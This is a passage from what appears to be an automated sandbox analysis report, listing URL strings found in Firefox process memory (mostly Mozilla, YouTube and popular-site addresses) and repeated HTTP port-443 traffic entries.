Source: firefox.exe, 00000010.00000003.3144090733.000001A8B7F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3144473251.000001A8B7F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3140660799.000001A8B7F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.hulu.com/watch/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3099063952.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235315331.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000010.00000003.3144090733.000001A8B7F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3144473251.000001A8B7F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3140660799.000001A8B7F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.instagram.com/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3099063952.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235315331.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000010.00000003.3099063952.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235315331.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7CCF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mobilesuica.com/
Source: firefox.exe, 00000010.00000002.3313236547.000001A8B320B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: firefox.exe, 00000010.00000002.3339830804.000001A8B7BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: firefox.exe, 00000010.00000003.3116798829.000001A8B716B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 00000010.00000003.3262808062.000001A8C3D9C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3233508837.000001A8C3D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/anything/?
Source: firefox.exe, 00000010.00000002.3339830804.000001A8B7BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: firefox.exe, 00000010.00000003.3234228250.000001A8C3AAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/about/legal/terms/subscription-services/
Source: firefox.exe, 00000010.00000002.3336939375.000001A8B74A5000.00000004.00000800.00020000.00000000.sdmp, targeting.snapshot.json.tmp.16.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: firefox.exe, 00000010.00000003.3234335950.000001A8C3A2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3333256582.000001A8B7005000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3339830804.000001A8B7BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: firefox.exe, 00000010.00000003.3234228250.000001A8C3AAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/subscription-services/
Source: firefox.exe, 00000010.00000002.3339830804.000001A8B7BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 00000010.00000003.3233508837.000001A8C3D6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3262748007.000001A8C3DBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-mod
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 00000010.00000003.3234335950.000001A8C3A2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3333256582.000001A8B7005000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3339830804.000001A8B7BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B2755000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3287438057.0000029D563C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CDF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000010.00000003.3234335950.000001A8C3A2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3339830804.000001A8B7BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000010.00000002.3280593868.00000058EBD3B000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 00000010.00000003.3242315863.000001A8B9F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000010.00000003.3264282880.000001A8C31B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3099063952.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235315331.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3308379802.000001A8B289F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/findUpdates()
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B49A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B61D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B6159000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3099063952.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235315331.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000010.00000002.3339830804.000001A8B7B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sling.com/
Source: firefox.exe, 00000010.00000002.3315520315.000001A8B3F66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7CAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000003.3275747151.000001A8B8066000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3229813435.000001A8B6D65000.00000004.00000800.00020000.00000000.sdmp, 14287614-3088-4146-9848-cff2ed487ea7.tmp.17.dr String found in binary or memory: https://www.tiktok.com/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/FIRST_CONTENT_PROCESS_TOPICoperationsRequiringRestartKEY_PLUGIN_ALLOW_X64_O
Source: firefox.exe, 00000010.00000003.3099063952.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235315331.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: firefox.exe, 00000010.00000002.3336939375.000001A8B7453000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3236983756.000001A8BFD4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235722215.000001A8C37DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3270005819.000001A8B8DB9000.00000004.00000800.00020000.00000000.sdmp, 14287614-3088-4146-9848-cff2ed487ea7.tmp.17.dr String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 00000010.00000003.3240111814.000001A8BFFCD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3265309012.000001A8C0699000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2B0A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CD0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000010.00000003.3270005819.000001A8B8DB9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3283028567.0000029D55F6A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3284374660.0000029D56104000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3284374660.0000029D56100000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3282652339.000002B9C28BA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3291692182.000002B9C2CA0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3291692182.000002B9C2CA4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3283065677.000001F42CAEA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3290620208.000001F42CED0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3290620208.000001F42CED4000.00000004.00000020.00020000.00000000.sdmp, Session_13376892216433120.17.dr, History.17.dr, KQGBYWk[1].ps1.6.dr, KQGBYWk.ps1.6.dr String found in binary or memory: https://www.youtube.com/account
Source: firefox.exe, 0000000F.00000002.3032272020.000002B535160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account--attempting-deelevationj%
Source: firefox.exe, 00000010.00000002.3302124352.000001A8A5F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account8WE
Source: firefox.exe, 00000010.00000002.3299533997.000001A8A5D60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountC:
Source: firefox.exe, 00000010.00000002.3299129330.000001A8A5CE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountH
Source: firefox.exe, 00000010.00000003.3029532362.000001A8A844F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3304423656.000001A8A844F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2900000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3284374660.0000029D56104000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3283028567.0000029D55F60000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3284374660.0000029D56100000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3291692182.000002B9C2CA0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3291692182.000002B9C2CA4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3282652339.000002B9C28B0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3290620208.000001F42CED0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3290620208.000001F42CED4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3283065677.000001F42CAE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:
Source: firefox.exe, 0000000B.00000002.2991420610.0000027D5D6C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account_S
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountbound
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountgetCurrentInnerWindowWithIdbrowser-open-homepage-startVALIDATE_ALLOW_
Source: firefox.exe, 00000010.00000002.3304423656.000001A8A841A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3029532362.000001A8A8425000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountl
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3264282880.000001A8C31B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 00000010.00000002.3297704058.0000010530930000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://yandex.com
Source: firefox.exe, 00000010.00000003.3270005819.000001A8B8DB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
